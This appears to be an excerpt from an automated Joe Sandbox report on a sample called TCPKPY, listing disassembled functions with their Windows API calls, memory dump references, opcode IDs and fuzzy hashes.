                                                                                                                • Instruction ID: ba761fa446a95b5caee74426f29f86cc43a909b5262cdc99a597792058637cee
                                                                                                                • Opcode Fuzzy Hash: c27f1cc162311908539c3769da665e52bd5369169d04b6f68adb31360a628fe0
                                                                                                                • Instruction Fuzzy Hash: 853188B1811229AACF54EFF4E849BDDB7B89F09300F5045DAE509E3141EB309B98CF65
                                                                                                                Function 00242FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                • Opcode ID: 9a52687c24bca8891932a984bf1ef5deee554863de6f528cb81532a12038e565
                                                                                                                • Instruction ID: 7f7663e8348ac1cd69db66907d140b0338f3fb2c8cc607fccc192bc4ecf6c152
                                                                                                                • Opcode Fuzzy Hash: 9a52687c24bca8891932a984bf1ef5deee554863de6f528cb81532a12038e565
                                                                                                                • Instruction Fuzzy Hash: CE219B32134622B6C738FA74AC02FFB73E89F25300F904126F48687081EBD19AB6D790
                                                                                                                Function 002417C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0024180D
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00241833
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00241836
                                                                                                                • SysAllocString.OLEAUT32 ref: 00241857
                                                                                                                • SysFreeString.OLEAUT32 ref: 00241860
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0024187A
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00241888
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: bc5faede4d1dd0d85f0f9176c5716aa8caad34b8678b2c0c612ae9aa8b241c39
                                                                                                                • Instruction ID: 198c6cded051d9ee7a594d9e26820501644c76b7e477f6337699e0febcbfcb20
                                                                                                                • Opcode Fuzzy Hash: bc5faede4d1dd0d85f0f9176c5716aa8caad34b8678b2c0c612ae9aa8b241c39
                                                                                                                • Instruction Fuzzy Hash: C5217435611205AFAB14AFA8DC8DDBA77ECEF093607408125F915DB2A5D670EC918B60
                                                                                                                Function 0026A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
                                                                                                                  • Part of subcall function 0021C619: GetStockObject.GDI32(00000011), ref: 0021C66B
                                                                                                                  • Part of subcall function 0021C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0026A13B
                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0026A148
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0026A153
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0026A162
                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0026A16E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                • Opcode ID: b16e384fed68338c0672cb85fa3bf84e7d192bbb2f91ea598619f8f31a0394ff
                                                                                                                • Instruction ID: 946bb19b4a309f764a06c6a1e9c370c5d7fb73bc61911e78d3f6e4aec5e9797a
                                                                                                                • Opcode Fuzzy Hash: b16e384fed68338c0672cb85fa3bf84e7d192bbb2f91ea598619f8f31a0394ff
                                                                                                                • Instruction Fuzzy Hash: 7911D0B5150219BEEF105F60DC86EE77F5DEF09398F014211FA08A2090C6729C71DFA0
                                                                                                                Function 0026E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0026E14D
                                                                                                                • _memset.LIBCMT ref: 0026E15C
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002C3EE0,002C3F24), ref: 0026E18B
                                                                                                                • CloseHandle.KERNEL32 ref: 0026E19D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                • String ID: $?,$>,
                                                                                                                • API String ID: 3277943733-2698479111
                                                                                                                • Opcode ID: 4992048baa156fc2e824b61c807dd96a57547582bda4a955f4290c7edfb7513d
                                                                                                                • Instruction ID: f2e50577dbafb85d887a8882b2d2ae70459c6d19ffb8e5c37c4917e495f525a2
                                                                                                                • Opcode Fuzzy Hash: 4992048baa156fc2e824b61c807dd96a57547582bda4a955f4290c7edfb7513d
                                                                                                                • Instruction Fuzzy Hash: 6CF054F1950311BEE310AB65BC0DFB77AACDF05354F008C24BA08D5592D3B64E6057A4
                                                                                                                Function 0021C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 0021C6C0
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0021C701
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0021C729
                                                                                                                • GetClientRect.USER32(?,?), ref: 0021C856
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0021C86F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1296646539-0
                                                                                                                • Opcode ID: 50f2037c629cd5eb956ddb8fcece540bdfcb449dd3505c255aca3dc5974d1e74
                                                                                                                • Instruction ID: 7ca012f9d03a221139e21374e8f0f46e78914a160f91d085849048e850bf1c53
                                                                                                                • Opcode Fuzzy Hash: 50f2037c629cd5eb956ddb8fcece540bdfcb449dd3505c255aca3dc5974d1e74
                                                                                                                • Instruction Fuzzy Hash: 15B16A7992024ADBCF10CFA8C4807EDB7F1FF18310F258169EC59AB654DB70A9A0CB65
                                                                                                                Function 00249569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253778849-0
                                                                                                                • Opcode ID: 0419fee3858b8c2a99dcd1e91b6cf4856a4207e9eddc191b2bfae0a991306dcc
                                                                                                                • Instruction ID: a3d5cd5f17d57eb939fc0712d3fd15ff35039cf86da4c92522fe18ac6869c266
                                                                                                                • Opcode Fuzzy Hash: 0419fee3858b8c2a99dcd1e91b6cf4856a4207e9eddc191b2bfae0a991306dcc
                                                                                                                • Instruction Fuzzy Hash: 14619C7052021AABCB05EF64CC81EFF77A9AF04308F054559F85A6B1D3DB74A965CF50
                                                                                                                Function 00262EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00262FA0
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00262FE0
                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00263003
                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0026302C
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0026306F
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0026307C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046560759-0
                                                                                                                • Opcode ID: 4946010505478e6ccc28f95ed86b210ae4cd728409619d8931f6c3cd4845262f
                                                                                                                • Instruction ID: a35179bdd62aa220eb33d79627d6df51ce927c52b70162e94ff1e2dec2909beb
                                                                                                                • Opcode Fuzzy Hash: 4946010505478e6ccc28f95ed86b210ae4cd728409619d8931f6c3cd4845262f
                                                                                                                • Instruction Fuzzy Hash: 9B513671229301AFC704EF64C885E6BB7B9BF88304F044919F585872A2DB71EA69CF52
                                                                                                                Function 0021DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2037614760-0
                                                                                                                • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                • Instruction ID: 777404b695a01d222204cfdb2532a43862d28aa25cc70360cbc1566dc1ee35f2
                                                                                                                • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                • Instruction Fuzzy Hash: 7A51D031924226EACB11AF98D4419FEB7F1EF24710F50844BF581AB291DBB45BF2DB90
                                                                                                                Function 00242ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00242AF6
                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 00242B68
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 00242BC3
                                                                                                                • _memmove.LIBCMT ref: 00242BED
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00242C3A
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00242C68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1101466143-0
                                                                                                                • Opcode ID: 1c0df5910dbbfb92022b059ea6be507e439198e51fe6bd16956011e93792d7ba
                                                                                                                • Instruction ID: b4769e82430cf31c559a0d622df4e61c8f833dbb872351cf6cca51cbc42c9d28
                                                                                                                • Opcode Fuzzy Hash: 1c0df5910dbbfb92022b059ea6be507e439198e51fe6bd16956011e93792d7ba
                                                                                                                • Instruction Fuzzy Hash: 76518AB5A1020AEFDB14CF58C884AAAB7B8FF4C314B15855AF959DB340E330E955CFA0
                                                                                                                Function 002682DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 0026833D
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00268374
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0026839C
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 0026840B
                                                                                                                • GetSubMenu.USER32(?,?), ref: 00268419
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0026846A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                • String ID:
                                                                                                                • API String ID: 650687236-0
                                                                                                                • Opcode ID: 223dd0648a6b8d6b959e4c6771640f88cd3a5dcef5464ba424d5111d68d0138d
                                                                                                                • Instruction ID: 8efa19417241ab34b2b58d84e524b0770a1d9a5f767ae55d78469e72e6191f92
                                                                                                                • Opcode Fuzzy Hash: 223dd0648a6b8d6b959e4c6771640f88cd3a5dcef5464ba424d5111d68d0138d
                                                                                                                • Instruction Fuzzy Hash: 8B51AF75A10216EFCB10EFA4D845AAEB7F5EF48710F104199E911BB391DF70AEA18F90
                                                                                                                Function 002454E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0024552E
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00245579
                                                                                                                • IsMenu.USER32(00000000), ref: 00245599
                                                                                                                • CreatePopupMenu.USER32 ref: 002455CD
                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 0024562B
                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0024565C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311875123-0
                                                                                                                • Opcode ID: 01f0b2213f9a0352f71ca19178d2ea9e8f965e666e85eba9af68e8b5a7051ac0
                                                                                                                • Instruction ID: 0a783b9564e30e1d09ebc2460e26ace5c8cf1f935bb6ded41948476ed6b3e10c
                                                                                                                • Opcode Fuzzy Hash: 01f0b2213f9a0352f71ca19178d2ea9e8f965e666e85eba9af68e8b5a7051ac0
                                                                                                                • Instruction Fuzzy Hash: 1C510870520A2AEFDF18CF68D888BADBBF9AF05314F904119E4859B292D3B08954CF51
                                                                                                                Function 0021B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0021B1C1
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0021B225
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0021B242
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0021B253
                                                                                                                • EndPaint.USER32(?,?), ref: 0021B29D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 1827037458-0
                                                                                                                • Opcode ID: dea901b19bc11d7bdc2b3c940b30781c6a10d73e529b1362f94047b569ab9f42
                                                                                                                • Instruction ID: 03446e44fcc850aa5da8d458426180f382440e194a816e81db69759bdfca5875
                                                                                                                • Opcode Fuzzy Hash: dea901b19bc11d7bdc2b3c940b30781c6a10d73e529b1362f94047b569ab9f42
                                                                                                                • Instruction Fuzzy Hash: 2C41D370114201AFD711DF24EC89FBA7BF8EF56320F140628F999872A2C7309CA9DB61
                                                                                                                Function 0026E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(002C1810,00000000,?,?,002C1810,002C1810,?,0027E2D6), ref: 0026E21B
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 0026E23F
                                                                                                                • ShowWindow.USER32(002C1810,00000000,?,?,002C1810,002C1810,?,0027E2D6), ref: 0026E29F
                                                                                                                • ShowWindow.USER32(?,00000004,?,?,002C1810,002C1810,?,0027E2D6), ref: 0026E2B1
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 0026E2D5
                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0026E2F8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: c2d38f1dca6893e254256f842dc7242ebeb4b10b0d670faaaa81b601e262ec3d
                                                                                                                • Instruction ID: 8ab3cbcf1b62e92088bcdd33705aea76be3ee7d7d5c21b3f464ad1e51274f210
                                                                                                                • Opcode Fuzzy Hash: c2d38f1dca6893e254256f842dc7242ebeb4b10b0d670faaaa81b601e262ec3d
                                                                                                                • Instruction Fuzzy Hash: 4D41B238201142EFDF26CF14D4A9B947BEABF06304F1941B9EE588F2A2C731A895CB50
                                                                                                                Function 0023BC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0023BCD9
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0023BCE0
                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0023BCEF
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 0023BCFA
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0023BD29
                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 0023BD3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                • Opcode ID: e3025d5d1bb8fce0bda6073d39d2ebcbfc3ae4d4f55f85f084de6a1b13afa002
                                                                                                                • Instruction ID: aaf546ff857dc86f9a7a8786ae78075ab41659db50437f2b60cd70a389c486a3
